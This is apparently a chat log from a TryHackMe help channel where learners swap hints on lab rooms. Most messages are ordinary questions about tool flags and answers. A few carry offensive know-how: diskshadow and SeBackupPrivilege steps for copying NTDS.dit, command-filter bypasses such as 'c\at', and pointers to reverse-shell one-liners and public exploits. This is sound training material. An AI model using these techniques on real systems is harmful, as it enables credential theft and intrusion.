What is the name of the service that lists Systems Internals as the manufacturer?

But nothing in the text or the link provided in the text seems to point me in the right directen.

In System Configuration navigate to the Services tab and click ‘Manufacturer’ to sort alphabetically by the service manufacturer. Look for the service manufactured by ‘Systems Internals’.

thx!

rep @white tiger

Bruh

+rep @white tiger

Gave +1 Rep to @white tiger

Hi ! Im having an issue with the catregex room, I cannot find the answer to "
Match all of the filenames of question 4, except "File7" (use the hat symbol)"
I've tried [Ff]ile[1-9^7], [Ff]ile[^7][1-9], [^File7][Ff]ile[1-9] and nothing seems to work

I am having trouble with task 3 of this room https://tryhackme.com/room/furthernmap

the question is

How would you tell nmap to scan all ports?

and the answer is --version-all but the website is saying that its wrong i searched for other answers too but i found none which are 3 char

There is one that is 3 char.

man nmap Then look for ports.

i did but found none

man nmap | grep "ports"

i got the flags for the "relevant" room but i want to do know what else i could do with nt authority\system role. or any extra vulnerabilities i can exploit?

no i cant find any

There is one there, Look under -p

I'm looking at it right now.

https://paste.pythondiscord.com/eqoferozar

I'm not clicking that.

If you wish to share pictures, you can verify.

!docs verify

k

--exclude-ports ??

No, there is a 3 character* flag though.

ya

holla, need a nudge for privilege escalation on tomghost room, tried sudo, cronjobs, suid

i tried -sV its not correct

No, that's for something completely different.

sudo -l ?

i got it -p-

yep i was desperate

not allowed

the manuals for some tools is massive.

Have you enumerated all the ports? ||Specifically 8009 + 8080||

i dint thinnk -p- could be a switch

im already in with ssh on the user and got user.txt, only need to privesc

ohhh

hold on

Ah, you found the files then? 😄

i did but dont know how to initiate connection with them lol

bruh

am i that stupid

open the .pgp file with the pgp private key...

ugh

No, you're probably over thinking it,

yeah im tried to priv esc with other things because im overlooking stuff lol

So you have access to the files now then?

not yet

trying my best lol, ill update when im stuck again

One of them can be done with ||John||

ok im lost, encryption is a bit of a weak spot

I am stuck on the room "Intro PoC Scripting" --> https://tryhackme.com/room/intropocscripting, I don't know how is correct answer for this question: " Which HTTP response header allows us to send an authenticated POST request?". I read, read, read and still I don't know. Any tips?

The answer is in the task.

can i do anything with netbios-ssn on port 139?

It's in the prior section. "The cookie is formatted by reading the output of the..."

Something like that I suppose.

I also read the stupid text like 900 times.

=====
Hello guys, I am so confused at room "Wekorra" (https://tryhackme.com/room/wekorra) as follow

• If I do manual SQLi, I cannot get the table "wp_users" from "wordpress" database
• But if I use sqlmap, it can detect the table "wp_users"
  → What did I do wrong at here? Why the manual cannot findout the wp_users table?

I am having trouble with Task 4 Scanning of this room: https://tryhackme.com/room/rpnessusredux#
I'm not getting any vulnerabilities when I scan the Active Machine IP.
I deploy the machine, copy the machine IP, and then do the basic scan with the settings provided. Any idea what I am missing?
I've tried re-deploying the machine, and also read other posts and watched YT videos. I can't see what I am missing.

I'm current working on the bonus question on https://tryhackme.com/room/burpsuiteintruder (Automate column_name discovery with BurpSuite Intruder using SQLi) but I don't want to do this without a wordlist. I've been going through /usr/share/wordlists on my attackbox and was unable to find a suitable one. Can anyone point me to where I could find a good list?

Thanks

Gave +1 Rep to @burnt rivet

No one can explain me about this?

This section might be helpful:

If you still need help I solved it today

hey can someone help me on task 6 subdomain enumeration

I am putting in the exact command but it doesnt work

https://tryhackme.com/room/subdomainenumeration

try inputting seclists with all lowercase letters. when this room was made the seclists directory was spelled the way they have it. now it's all lowercase

Ok thanks

Gave +1 Rep to @wicked mirage

yw

it didnt work

can you send a screenshot of you putting in the command and then the output after you hit enter

I figured it out i forgot to tell sorry

Thanks for trying to help

Gave +1 Rep to @wicked mirage

anytime. mind telling me what it was? I'm just curious

yeah let me check

oh ok

i forgot to input the numbers for the size

can somebody help me with the room splunk101

i am stuck in this q

why cant i use psexec.py that is used in the walkthrough

Hi, I have an issue with the room ‘RazorBlack’ . || The issue occurs when I try to copy the ‘NTDS.dit’ to my current folder ( ex: C:\tmp ). Im creating my ‘shadow disk.txt’ and lunch it from the target machine with diskshadow.exe /s c:\tmp\diskshadow.txt and I get the message The shadow copy was successfully exposed as h:'. Then I "import-module" both DLL's 'SeBackupPrivilegeUtils.dll' and 'SeBackupPrivilegeCmdLets.dll' . I can get the 'SYSTEM' file properly however when I try to get the NTDS.dit file with the following command : 'copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite' , I'm getting an error message saying 'it cannot find the path' meaning 'h:\windows\ntds\ntds.dit' is not the correct path. || Any suggestion ?

Can someone give me a hint about jack room? I found Wordpress users and when i try to bruteforce with rockyou seems taking forever... Am i on right path?
https://tryhackme.com/room/jack

Are you bruteforcing all users or single user?

All found users.

Wait for a while , you will get the pass

need a lil hint for chill hack room

||got a command injection at /secret , found etc/passwd but nothing special there. user apaar has local.txt and that only contains the word rce. thats all|| dont know how to continue for now

||hydra?||

If you were able to execute a command on /secret try to execute a revshell one liner…

As i said in general

Brainblock

Jeez thanks dude

@serene badger Although you may need to || bypass a filter for certain commands such as l\s -la or c\at index.php||

Ill read that once ive tried further

Heading home for now so could be an hour or 2

I am stuck in OSquery basic. I need hint for these 2 questions.

Which table stores the evidence of process execution in Windows OS?
One of the users seems to have executed a program to remove traces from the disk; what is the name of that program

you can use fasttrack.txt as password source. I had also not got any result with rockyou.txt

Got the password with fasttrack.txt under 5 min. Well done!

Not a hint I need I completed the room but ran into something during that I don't understand and hope someone can help me to. I was doing the Authentication Bypass room section Brute Force and it mentions that if you pipe the output into the username list then you may have to clean up the data first to be able to user the list. So I tried it as it was piped and it didn't work. I then opened with nano but there were special characters - why is this? I cleared all the extra formatting leaving only the usernames, saved and tried again but it didn't work and wouldn't work or show out put with cat. In the end I just created the list with gedit. So how come nano had special characters when it was direct from the output and why when I removed it did show with cat? It looked like this in Nano: ^[[2Kusername.

does anyone know how to get the shell to get the flag for the third question on task 1 of "AV Evasion: Shellcode"?

same question does any one have a hint

looking at the room Theseus - stuck on the final part of it, after ||getting a session as the ariadne user||. There is a file I can't make sense of, and a private key I can't use. Anyone want to drop me a hint?

First one, you gotta search for "execution" table in the documentation, the answer is ||userassist||
2nd question I am stuck at still :\

In the room Simple CTF (https://tryhackme.com/room/easyctf), can someone point me to where I could find information on the privilege escalation part (Second to last question)?

If you select Help You'll see Writeups

If that's what you're looking for?

Hmm I'm reluctant to look at those, because of them potentially giving it away completely, but I got a hint from Mac. Thanks anyways

Yeah, that is true.

That's why I avoid them, some even give you the flag/answer which is not good either (unless you learn something from doing it that way).

Thank you for the list C: Skipping the spoiler for now.

Gave +1 Rep to @burnt rivet

Figured it out

Hi! Can someone give me a hint what to look for in the Ignite room?
||I got a bad but working shell with https://www.exploit-db.com/exploits/50477 but I don't know how what to look for now.. ||
Edit: got the user flag, don't know how i could miss that lol

For Pyramid of Pain - I found the answer that was is a ASN. I've tried a dozen searches but all that comes up is "autonomous system" is this what the ASN is that is being referred to in the quiz question?

"What is the ASN for the third IP address observed?"

cn some tel me the ans of bank oage

Asn is autonomous system number, like AS123456

hey, I need a nudge regarding "Crypted"

im struggling to get anything at all cracked with hashcat. if I have a hash that something like $<1char>$<10chars>.<29chars>.<4chars>/<10chars>.<40chars>, other than using the first few chars for choosing the mode, how do I make sense of what the rest of the hash is? Seems the second part is the salt... how do I specify salt with hashcat? also with a bit more googling it looks like '/' is a potential output character for sha...

For Pyramid of Pain, can someone help me? It's the only response missing:

Use your OSINT skills and provide the name of the malicious document associated with the dropped binary

@grand nebula so what did you use in the question "Using your OSINT skills, what is the name of the malicious document associated with the dropped binary?"

@grand nebula actually not that one but "Use the tools introduced in task 2 and provide the name of the malware associated with the IP address"

@grand nebula for a more specific hint look at the screenshot just above the questions, don't you find it familiar?

Yeah I was looking for some hints, i've realized than its a tricky question

@grand nebula not at wall, it's so basic you will facepalm yourself 😄 like I did

but yeah the hint is in the screenshot and is a combination of thing that you have done until that point

Seems than i'm gonna end tilted if i find the answer lol

😄

do you want me to help a little bit more?

I would apreciatte it

I'm was like 2 hours trying to figure out the answer before asking for help

have you tried <any.run>?

Either im dumb or Task 9 on Pyramid of pain doesnt want to give me the flag or im just wrong

can anybody give me a hint on how to find the decryption key on Crypted room please

Im stuck here too haha...any advice?

Any hints appricated. I tried every combination there is. Also of the text in the picture. It is an abbriviation or ..?

Like you and many others, only problem with question 3. Any hints appriciated because I'm still stuck.

RE: https://tryhackme.com/room/torforbeginners

Access the website below and capture the flag by copying bitcoin address at the bottom of the page!

http://danielas3rtn54uwmofdo3x2bsdifr47huasnmbgqzfrec5ubupvtpid.onion/

The Bitcoin address posted on that page is the incorrect answer.

IIRC.

The page no longer works and the hint is the answer.

The page did work for me when I opened it.

Home

Hello, my name is Daniel and this is my personal website, that I develop in my free time. This site is available as Tor hidden service or via my clearnet proxy danwin1210.de.

This is just the landing page, you can navigate to the pages that interest you most by clicking on the entries in the navigation bar on the left.

You can download my PHP Chat based on LE-CHAT on GitHub. The onion link list script is now also available for download on GitHub. The setup I use for hosting is now also available on GitHub

If you like, what I've built here, you can support me by donating via Monero: 432Z3PTrRso52GHHpmPRpvLhecsnc7EFsVd2TzsCJaNmK4vivDxghRB5yVCj2nzCEGajeF3rBqJ43PcpxRnvZkMs49fufzD , Ethereum: 0xFbd055EEeA3b5a3459FeC6A8FAe631305b1079A0 , or Bitcoin: bc1q8jcfxsmcz7lhk7g9urnzxpwhxsje2n2gz34cya . More options available, just contact me.

Was published on the page.

Ok,.

The bitcoin address is wrong.

The answer the hint.

It is.

I noticed.

Maybe im missing an option on the site. But is it possible to turn off the answer format in rooms on tryhackme? I find it sometimes a bit too helpful and i will just be looking at the length instead of properly reading the question and knowing the answer myself

No, there isn't.

Thanks for the quick reply!

Gave +1 Rep to @lucid junco

I have a question regarding the room Brute Force Heroes, so I'm wondering before I launch the attack within burpsuit wether or not it will matter if I have switched the foxy proxy off.

*Burpsuite.

You can remove it through dev tools

And use something like tamper monkey

In the Pyramid of Pain room Task 5 question 2 is asking us to use either metadefender or virustotal to provide the name of the malware associated with the IP address. I entered the IP address 35.214.215.33 and both found it to be safe. Is anyone else getting this?

Was able to find it using google dorking. It's associated with Emotet.

I am having trouble with Task 9 on the Pyramid of Pain room. I have tried everything that makes any sense at all. I have even tried many combinations that make no sense. I can not get the flag. Can someone help me? Thanks in advance.

The task is broken if I recall correctly. You should be able to advance regardless

The task can be done.

Hey guys I'm facing a problem in the gallery room;

mike@gallery:/tmp$ sudo -l
sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh
mike@gallery:/tmp$ sudo /bin/bash /opt/rootkit.sh
sudo /bin/bash /opt/rootkit.sh
Would you like to versioncheck, update, list or read the report ? read
read
Error opening terminal: unknown.
mike@gallery:/tmp$ sudo /bin/bash /opt/rootkit.sh
sudo /bin/bash /opt/rootkit.sh
Would you like to versioncheck, update, list or read the report ? read
read
Error opening terminal: unknown.

@fresh grove I believe those are separate. Eg: | sudo -u root /bin/bash | and | sudo - u root /opt/rootkit.sh |

Ohh......

How come you have added;

"root"

???

Did you google that error and tried the solutions that come up with it ?

This is not an error.

mike@gallery:/tmp$ sudo -l
sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh

Error opening terminal: unknown.

Yeah I think it's because I didn't upgrade the shell properly some how.

I added the -u to specify the user. The box I did yesterday had sudo privileges for another user besides root on the machine. So had to escalate from www to user to another user to root.

Oh...

I think it had something to do with not upgrading the shell properly @vital estuary I'll have to read up on doing that properly.

have you figured out how to upgrade a shell

Not right now....

I'm trying to figure out where the public rsa key I created went to @vital estuary .

look up upgrading to tty shell

I'm working on a different room now 🙂

it might have got saved to a hidden folder use ls -la to show all files and folders it should be in .ssh

Apparently it went here;

/home/su8z3r0/.ssh/id_rsa

Well at least that was the output of;

ssh-keygen

Though when I go to that directory there is only one file in there called "known_hosts"

Hi there,
I'm kinda stuck on the Lazyadmin CTF.
I've already seen many post about this, I've reached the user flag and trying to leverage the sudo -l weakness I found.
|| I tried to modify /etc/copy.sh file but whatever I do, I always get as answer a password ask from sudo.||
I can't understand how to use what sudo -l return. Does anyone have a small hint to help me a little ? 🥺

You should already have write perms on that file.

I can't find answer for this question. Any hints
Machine name : tempest
Task 7
Q: The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the aforementioned file?

Only this question is left 🥺

what room

Tempest
https://tryhackme.com/room/tempestincident

i havent done that srry

Sorry but I'm not sure to understand (I'm an eternal rookie).
I do not have permission issues, copy.sh can be executed by any user.

You should be able to echo in to the file, I think that's what I done,

Yes, that's what I did. But I just understood what was wrong.
|| I didn't use the whole path of the command, I was only doing /usr/bin/perl or /home/itguy/backup.pl, not both to launch the command, now it's ok||
Anyway, thanks for your time 😉

Gave +1 Rep to @lucid junco

Hi guys I'm working on the Fowsniff CTF room and I'm having trouble with one of the hashes;

a92b8a29ef1183192e3d35187e0cfabd

I used hash-id to find out what it was then got this;

HASH: a92b8a29ef1183192e3d35187e0cfabd

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

So then I use Hashcat to try and crack it though nothing.

DM if you are still stuck.

in the Linux Privilege Escalation room at the Kernel Exploit practice did I find the right CVE? i found the following:

||https://www.exploit-db.com/exploits/37292||

HI .. I have started room https://tryhackme.com/room/breachingad Question is : -

What is the username of the third valid credential pair found by the password spraying script?
When I am trying to reach http://ntlmauth.za.tryhackme.com/ through browser , it is not working. I guess DNS is not been configured properly. Tried mentioned way but not working , please help

Hello everyone I’m learning the Linux fundamentals part 2, trying to login to the SSH but it keep saying wrong password…. “tryhackme” was suppose to be the right password it doesn’t work please does anyone know how I can solve that please ? Thank you

@devout crag are you using the attackbox?

@woeful plaza have you figured it out yet

@fleet basin yes ..

I try with both attackbox and Linux machine it’s doesn’t work

Can I have the IP of the target machine ?

@devout crag ok just to make sure, after you started the attackbox (blue button) you also have to start the machine. (Green button).. then use attackbox to ssh in to machine

hello, I don't understand first question in task 4 of the room "Pyramid Of Pain" under SOC Level 1 learning path

I would love hint, I can't find that one "malicious URL"

oh actually no, I just refreshed website and now It's working again

PRO tip I just learnt: after you suspend system, restart website in order to work xd

Hey ppl, so I am on my first lessons on TryHackMe and the task where it involves bank transfer. I do enter the right answer that is shown on my account balance but it keeps saying incorrect. I already verified my account so...

pls provide us with room name and task number

Into to offensive security task 1

what is that "right answer" you entered?

$767.68 which is the balance after transferring the 2000

so, the question is not asking you how much money you have right now, It gives you a flag which indicates that you have made right move, refresh page and then try to find a word that wasn't there before

if you still don't find it you can call me in dm I can show you how to do it, or else I can just provide you with right answer but that is not fun, try to re-read question again and you will figure something out

I will re-read it thanks for the hint. ✌🏼

Gave +1 Rep to @old dew

alright! best of luck

I’ll do that now thank you

Gave +1 Rep to @vital estuary

Got the answer thanks! 🕺🏼

Gave +1 Rep to @old dew

@devout crag were you able to ssh into that machine?

I’m good now

nicee!!! good job! keep the great work on!

sometimes you need to type your answer not copy paste for validation.

sometimes if you copy paste with your clipboard then paste things on your terminal or browsers.

I'm in task 4 on network services and im running kali linux on oracle virtual box and I am running the right command "smbclient //{ip}/profiles -U -p 445 but after using "anonymous" for the username and not using a password (just hitting enter) it tells me host is unreachable. It worked for the tutorial on youtube. While I could just use the answer from youtube I would rather try to figure this out but I am stumped.

Actually it says connection to {ip} failed

can u ping?

It wasn't coming up for me either. Makes me think the task might be bugged, or the ip address no longer gets flagged.

Hey everyone, I'm having trouble with File Upload Vulnerabilities room, Task 8: Bypassing Server-Side Filtering: File Extensions

I'm wondering if there is currently a known bug in this room's vm or if I'm just not on the right track.

Problem
Not trying to give away too many details but I'm noticing when I upload certain file types or file type combinations that I'd expect to work It's telling me File must be chosen before being uploaded.
I've looked at a past walkthrough of this room that was posted back in June and as I expected the file type that I chose to upload to test should have worked.

I've tested this on both the Attack box as well as my vpn and neither have worked.

Appreciate any help/hints you all can throw at me. My DM's are open if you do not want to expose too much about the room.

UPDATE: I restarted the VM and it magically worked 🤦‍♂️

Hi, I'm in room Simple CTF, as far a a vector goes is the fact that ssh is running on a non standard port a potential vulnerability? Seems suspicious to me

Not really

Alright, I'll keep looking

Task 5 Question 4 on Pyramid of Pain room is messing me up lol

There are two of the same questions but with a different answer lengths. I found the answer to the first one

{Found it}

I search the tryhackme forums and got my answer.

The answer was right in front of my face lookin at app.any.run

Loving it !

really teaching you how to spot malicious activity and giving you resources for tools on how to do this ! so freaking amazing!!!

Working on REmux The Tmux would someone plz give me a clue for this question?;

How to reattach to a detached tmux session with the session name of "thm"

It's mentioned no where in the lesson how to do this.

└──╼ $man tmux | grep -i 'detached'
     tmux is a terminal multiplexer: it enables a number of terminals to be created, accessed, and controlled from a single screen.  tmux may be detached from a screen and continue running in the
             clients attached to the session are detached.  If -x is given, send SIGHUP to the parent process of the client as well as detaching the client, typically causing it to exit.  -r signi‐
             When enabled, focus events are requested from the terminal if supported and passed through to applications running in tmux.  Attached clients should be detached and attached again af‐
             If on (the default), the client is detached when the session it is attached to is destroyed.  If off, the client is switched to the most recently active of the remaining sessions.
     client-detached         Run when a client is detached
     [detached (from session ...)]
             The client was detached normally.
     [detached and SIGHUP]
             The client was detached and its parent sent the SIGHUP signal (for example with detach-client -P).
     A session may be detached using ‘C-b d’ (or by an external event such as ssh(1) disconnection) and reattached with:

└──╼ $man tmux | grep -i 'reattach'
     background, then later reattached.
     Each session is persistent and will survive accidental disconnection (such as ssh(1) connection timeout) or intentional detaching (with the ‘C-b d’ key strokes).  tmux may be reattached using:
     The update-environment session option may be used to update the session environment from the client when a new session is created or an old reattached.  tmux also initialises the TMUX variable
     A session may be detached using ‘C-b d’ (or by an external event such as ssh(1) disconnection) and reattached with:

Couldn't find anything in the manual either.

there's nothing after 'A session may be detached using ‘C-b d’ (or by an external event such as ssh(1) disconnection) and reattached with:' ?

seems like the answer would be there x)

'A session may be detached using ‘C-b d’ (or by an external event such as ssh(1) disconnection) and reattached with:' 

This isn't even in the page.

Same as this question.

How to switch between two or more tmux sessions without detaching from the current tmux session?

Nothing in the lesson teaching how to do this.

I cant say I have done this room, can you link it to me? Ill check with you 🙂

Okay great !!

Thanks so much @topaz umbra 🙂

Gave +1 Rep to @topaz umbra

https://tryhackme.com/room/tmuxremux

One would think a keyword search for "switch" would locate the information though no success.

This room is a disaster !!!!

sorry I got pinged

which task is it?

I'd have better luck trying to find the pot of gold at the end of the rainbow then being able to find the answers in this lesson.

lots of tasks in this room I see 😄

Task two it is.

It's not that. Rather the lesson doesn't provide the information needed to answer the questions.

the texts in general are not super well written I see

I see what you're saying

Yeah.....

It's worse then that.

The answers are simply not even there.

I think someone needs to review that room, it should be reported to staff members.

im just trying a few things, Ive got no experience with tmux pretty much

yeah it could do with an upgrade. You can send a feedback mail via #feedback-and-ideas about this room?

ok I got the answer but it was pretty much by guessing a bit

Yeah... I think it's necessary.

Especially considering that it is an "info" room.

Things like this would easily dissuade new users !!!

so looking at the amount ** for the blanked out answer in combination with the flags in the man page to attach a session + the hint the room gives, I ended up with the correct answer

if that is helpful for you 😅

Yeah that's what I was doing.

I couldn't find many answers for that room, I will go back to it later on.

✅

its kind of an old room too

That room has Dementia !!!!!!!

Forgot to include the instructions !!!!!

Dementia is a scary thing.

Quickly scours the internet for all foods that can prevent it.

Hey @topaz umbra do you know the site that has bash shell's posted up ?

I found it in a room I was doing the other day though now I cannot remember the site.

https://www.revshells.com/ ?

Hello, i'm doing linux fundamentals part 1, and when starting the machine, the attackbox doesn't spawn, and when trying to log via ssh to user linuxfundpart1v1 it ask's for a password, so i can't acces to the machine to answer the questions

It's a split screen machine.

yeah but it soesn't spawn when starting the machine

Look up the top, there might a be "slow split screen" button

oh ok that was it, thanks, looked the tutorial and the split view spawned when he started the machine, didn't knew i had to do that

Sometimes it auto starts, sometimes it doesn't.

For me anyway

Plus it's an old video, so they might have changed it since then.